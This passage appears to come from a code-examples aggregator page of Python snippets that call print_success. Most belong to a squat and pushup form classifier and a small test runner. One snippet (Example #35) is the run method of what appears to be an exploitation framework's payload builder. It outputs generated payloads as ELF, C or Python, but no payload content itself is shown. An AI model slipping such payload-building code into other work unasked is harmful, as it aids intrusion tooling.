        vqmm_cmd, '-quiet', 'n', '-list-of-files', files_list, '-random',
        randomSeed, '-codebook-size', codebookSize, '-codebook', file_cbk
    ])
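
A hypothetical invocation; the vqmm binary location and file paths are assumptions:

create_cbk("./vqmm", "src/tmp/vqmm/filelist.txt", "src/tmp/vqmm/codebook.cbk")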
Example #31
    def post(self):
        req_data = request.get_json()
        # Close (and flush) the file before advice() reads it back
        with open('squatData.txt', 'wb') as to_write:
            to_write.write(req_data['data'].encode("utf-8"))
        ut.print_success('Data written to file')
        json_res = jsonify(advice())
        ut.print_success('Advice file generated')
        return json_res
Example #32
    def get_prediction_features(self, exercise, reps):

        if exercise == 'squat':
            #=====[ Retrieves relevant training data for each classifier  ]=====
            X0, Y, file_names = self.extract_advanced_features(reps=reps,
                                                               multiples=[0.5],
                                                               predict=True)
            X1, Y, file_names = self.extract_advanced_features(
                reps=reps, multiples=[0.2, 0.4, 0.6, 0.8], predict=True)
            X3, Y, file_names = self.extract_advanced_features(
                reps=reps,
                multiples=[
                    0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55,
                    0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95
                ],
                predict=True)

            #=====[ Sets up dictionary of feature vectors  ]=====
            X = {}
            X['bend_hips_knees'] = preprocessing.StandardScaler(
            ).fit_transform(X3['bend_hips_knees'])
            X['stance_width'] = preprocessing.StandardScaler().fit_transform(
                X1['stance_width'])
            X['squat_depth'] = preprocessing.StandardScaler().fit_transform(
                X0['squat_depth'])
            X['knees_over_toes'] = preprocessing.StandardScaler(
            ).fit_transform(np.concatenate([X3[x] for x in X3], axis=1))
            X['back_hip_angle'] = preprocessing.StandardScaler().fit_transform(
                np.concatenate([X0[x] for x in X0], axis=1))

        elif exercise == 'pushup':
            #=====[ Retrieves relevant training data for each classifier  ]=====
            X3, Y, file_names = self.extract_pu_features(
                reps=reps,
                multiples=[
                    0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55,
                    0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95
                ],
                predict=True)
            X4, Y, file_names = self.extract_pu_features(
                reps=reps,
                multiples=[float(x) / 100 for x in range(100)],
                predict=True)

            X30 = np.concatenate([X3[x] for x in X3], axis=1)
            X40 = np.concatenate([X4[x] for x in X4], axis=1)

            #=====[ Sets up dictionary of feature vectors  ]=====
            X = {}
            X['head_back'] = preprocessing.StandardScaler().fit_transform(X40)
            X['knees_straight'] = preprocessing.StandardScaler().fit_transform(
                X30)
            X['elbow_angle'] = preprocessing.StandardScaler().fit_transform(
                X3['elbow_angle'])

        ut.print_success('Features extracted for ' + exercise)

        return X
Example #33
def preprocess_features(folder):
    utils.print_success("Preprocessing train set")
    folder = utils.abs_path_dir(folder)
    filelist = os.listdir(folder)
    nb_file = str(len(filelist))
    for index, filename in enumerate(filelist):
        utils.print_progress_start(str(index) + "/" + nb_file + " " + filename)
        convert_feats_files(folder + filename)
    utils.print_progress_end()
Example #34
	def classify(self, exercise, key, X, verbose=False):
		
		try:
			prediction = self.classifiers[exercise][key].predict(X)
			if verbose:
				ut.print_success(key + ': reps classified')
			return prediction
			
		except Exception as e:
			print e
			ut.print_failure(key + ': reps not classified')
			return None
Example #35
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )
Example #36
	def get_prediction_features_opt(self, exercise, reps, verbose=False):
			
		if exercise == 'squat':

			#=====[ Load feature indices  ]=====
			feature_indices = pickle.load(open(os.path.join('../inference/','squat_feature_indices.p'),'rb'))

			#=====[ Retrieves relevant training data for each classifier  ]=====
			X3, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[float(x)/20 for x in range(1,20)],predict=True)
			X30 = np.concatenate([X3[x] for x in X3],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['bend_hips_knees'] = X30[:,feature_indices['bend_hips_knees']]
			X['stance_width'] = X30[:,feature_indices['stance_width']]
			X['squat_depth'] = X30[:,feature_indices['squat_depth']]
			X['knees_over_toes'] = X30[:,feature_indices['knees_over_toes']]
			X['back_hip_angle'] = X30[:,feature_indices['back_hip_angle']]

		elif exercise == 'pushup':

			#=====[ Load feature indices  ]=====
			feature_indices = pickle.load(open(os.path.join('../inference/','pushup_feature_indices.p'),'rb'))

			#=====[ Retrieves relevant training data for each classifier  ]=====
			X3, Y, file_names  = self.extract_pu_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)
			X30 = np.concatenate([X3[x] for x in X3],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['head_back'] = X30[:,feature_indices['head_back']]
			X['knees_straight'] = X30[:,feature_indices['knees_straight']]
			X['elbow_angle'] = X30[:,feature_indices['elbow_angle']]


		if verbose:
			ut.print_success('Features extracted for ' + exercise)

		return X
Example #37
def run():
    """控制脚本的执行
    Args:
    Returns:
    Raises:
        KeyError: 如果配置文件没有设置会抛异常
    """
    use_env = options.use_env
    if use_env:
        fp = open("ruce.conf.yml.tmp", "w")
        with open("ruce.conf.yml") as conf_file:
            config = yaml.load(conf_file)
            if use_env in config["env"]:
                config["env"]["use_env"] = use_env
            yaml.dump(config, stream=fp, default_flow_style=False)
            fp.close()
            ret = shell("mv ruce.conf.yml.tmp ruce.conf.yml", capture=False)
            return
    current_dir = os.path.dirname(os.path.abspath(__file__)) + "/tpls"
    j2_env = Environment(loader=FileSystemLoader(current_dir), trim_blocks=True)
    case_name = options.gen_tpl
    if case_name:
        try:
            if os.path.exists("test_{}.py".format(case_name)):
                print "File test_{}.py has already existed".format(case_name)
                return
            new_case = j2_env.get_template("test_basic.tpl").render(name=case_name)
            create_file = open("test_{}.py".format(case_name), "w")
            create_file.write(new_case)
            create_file.close()
            print "create test_{}.py ok".format(case_name)
        except Exception as e:
            print ("gen_tpl params error\n" "--gen_tpl=case_name")
        return
    if options.gen_conf:
        try:
            env_name, host_port = options.gen_conf.split("=")
            host, port = host_port.split(":")
            new_conf = j2_env.get_template("basic_conf.tpl").render(env_name=env_name, host=host, port=port)
            create_file = open("ruce.conf.yml", "w")
            create_file.write(new_conf)
            create_file.close()
            print "create ruce.conf.yml ok"
        except Exception as e:
            print ("gen_conf params error\n" "--gen_conf='env_name=host:port'")
        return
    if options.name != "all":
        name_list = options.name.split(",")
        for name in name_list:
            file_name = "test_{}.py".format(name.strip())
            if os.path.exists(file_name):
                ret = shell(r"python {}".format(file_name), capture=True, debug=False)
                print ret.stdout
                print ret.stderr
    else:
        result_record = defaultdict(dict)
        name_list = os.listdir(".")
        print separator
        for name in name_list:
            if name.startswith("test_") and name.endswith(".py"):
                ret = shell(r"python {}".format(name), capture=True, debug=False)
                output = ret.stdout + ret.stderr
                parsed_result = parse_case(output)
                if parsed_result["passed"]:
                    print_success("{} ---- passed".format(name))
                else:
                    print_error("{} ---- failed".format(name))
                print "\r"
                result_record[name] = parsed_result
        parse_record(result_record)
    return
Example #38
	def set_classifiers(self, exercise, classifiers):
		self.classifiers[exercise] = classifiers
		ut.print_success("Classifiers stored for " + exercise)
Example #39
    def success(self, msg):
        print_success(msg)